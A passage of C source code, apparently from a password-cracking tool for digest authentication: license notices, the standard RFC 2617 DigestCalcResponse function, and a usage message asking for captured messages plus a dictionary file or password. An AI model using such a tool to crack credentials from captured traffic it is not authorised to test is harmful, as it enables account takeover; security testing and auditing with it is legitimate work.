//   Internet organizations, except as needed for the purpose of
//   developing Internet standards in which case the procedures for
//   copyrights defined in the Internet Standards process must be
//   followed, or as required to translate it into languages other than
//   English.
//
//   The limited permissions granted above are perpetual and will not be
//   revoked by the Internet Society or its successors or assigns.
//
//   This document and the information contained herein is provided on an
//   "AS IS" basis and THE INTERNET SOCIETY AND THE INTERNET ENGINEERING
//   TASK FORCE DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, INCLUDING
//   BUT NOT LIMITED TO ANY WARRANTY THAT THE USE OF THE INFORMATION
//   HEREIN WILL NOT INFRINGE ANY RIGHTS OR ANY IMPLIED WARRANTIES OF
//   MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
//
//   And that code in RFC 2617 was itself derived from RFC 1321 to which
//   an RSA Copyright applies:
//
//  Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All
//  rights reserved.
//
//  License to copy and use this software is granted provided that it
//  is identified as the "RSA Data Security, Inc. MD5 Message-Digest
//  Algorithm" in all material mentioning or referencing this software
//  or this function.
//
//  License is also granted to make and use derivative works provided
//  that such works are identified as "derived from the RSA Data
//  Security, Inc. MD5 Message-Digest Algorithm" in all material
//  mentioning or referencing the derived work.
//
//  RSA Data Security, Inc. makes no representations concerning either
//  the merchantability of this software or the suitability of this
//  software for any particular purpose. It is provided "as is"
//  without express or implied warranty of any kind.
// 
//  These notices must be retained in any copies of any part of this
//  documentation and/or software.
//
//-------------------------------------------------------------------------------

void  DigestCalcResponse(
    IN HASHHEX HA1,           // H(A1)
    IN char * pszNonce,       // nonce from server
    IN char * pszNonceCount,  // 8 hex digits 
    IN char * pszCNonce,      // client nonce
    IN char * pszQop,         // qop-value: "", "auth", "auth-int" 
    IN char * pszMethod,      // method from the request 
    IN char * pszDigestUri,   // requested URL
    IN HASHHEX HEntity,       // H(entity body) if qop="auth-int"
    OUT HASHHEX Response      // request-digest or response-digest
    )
{
      MD5_CTX Md5Ctx;
      HASH HA2;
      HASH RespHash;
      HASHHEX HA2Hex;

      // calculate H(A2)
      MD5Init(&Md5Ctx);
      MD5Update(&Md5Ctx, pszMethod, strlen(pszMethod));
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszDigestUri, strlen(pszDigestUri));
      if (strcasecmp(pszQop, "auth-int") == 0) {
            MD5Update(&Md5Ctx, ":", 1);
            MD5Update(&Md5Ctx, HEntity, HASHHEXLEN);
      }
      MD5Final(HA2, &Md5Ctx);
       CvtHex(HA2, HA2Hex);

      // calculate response
      MD5Init(&Md5Ctx);
      MD5Update(&Md5Ctx, HA1, HASHHEXLEN);
      MD5Update(&Md5Ctx, ":", 1);
      MD5Update(&Md5Ctx, pszNonce, strlen(pszNonce));
      MD5Update(&Md5Ctx, ":", 1);
      if (*pszQop) {
          MD5Update(&Md5Ctx, pszNonceCount, strlen(pszNonceCount));
          MD5Update(&Md5Ctx, ":", 1);
          MD5Update(&Md5Ctx, pszCNonce, strlen(pszCNonce));
          MD5Update(&Md5Ctx, ":", 1);
          MD5Update(&Md5Ctx, pszQop, strlen(pszQop));
          MD5Update(&Md5Ctx, ":", 1);
      }
      MD5Update(&Md5Ctx, HA2Hex, HASHHEXLEN);
      MD5Final(RespHash, &Md5Ctx);
      CvtHex(RespHash, Response);
}

//-------------------------------------------------------------------------------
//  usage() 
//
//  return:  none
//-------------------------------------------------------------------------------
void  usage (void)
{	
    printf( "\n%s", __AUTHTOOL_VERSION );
    printf( "\n%s", __AUTHTOOL_DATE );
    printf( "\n Usage:" );
    printf( "\n Mandatory -" );
    printf( "\n \tfilename of captured messages" );
    printf( "\n \tthen one of the following sets of options") ;
    printf( "\n \t\t-d filename of dictionary" );
    printf( "\n \t\t\tor" );
    printf( "\n \t\t-p password" );
    printf( "\n Optional -" );
    printf( "\n \t-r filename into which results are written");
    printf( "\n \t-v print in verbose mode\n" );
    printf( "\n" );

    exit( EXIT_FAILURE );
}

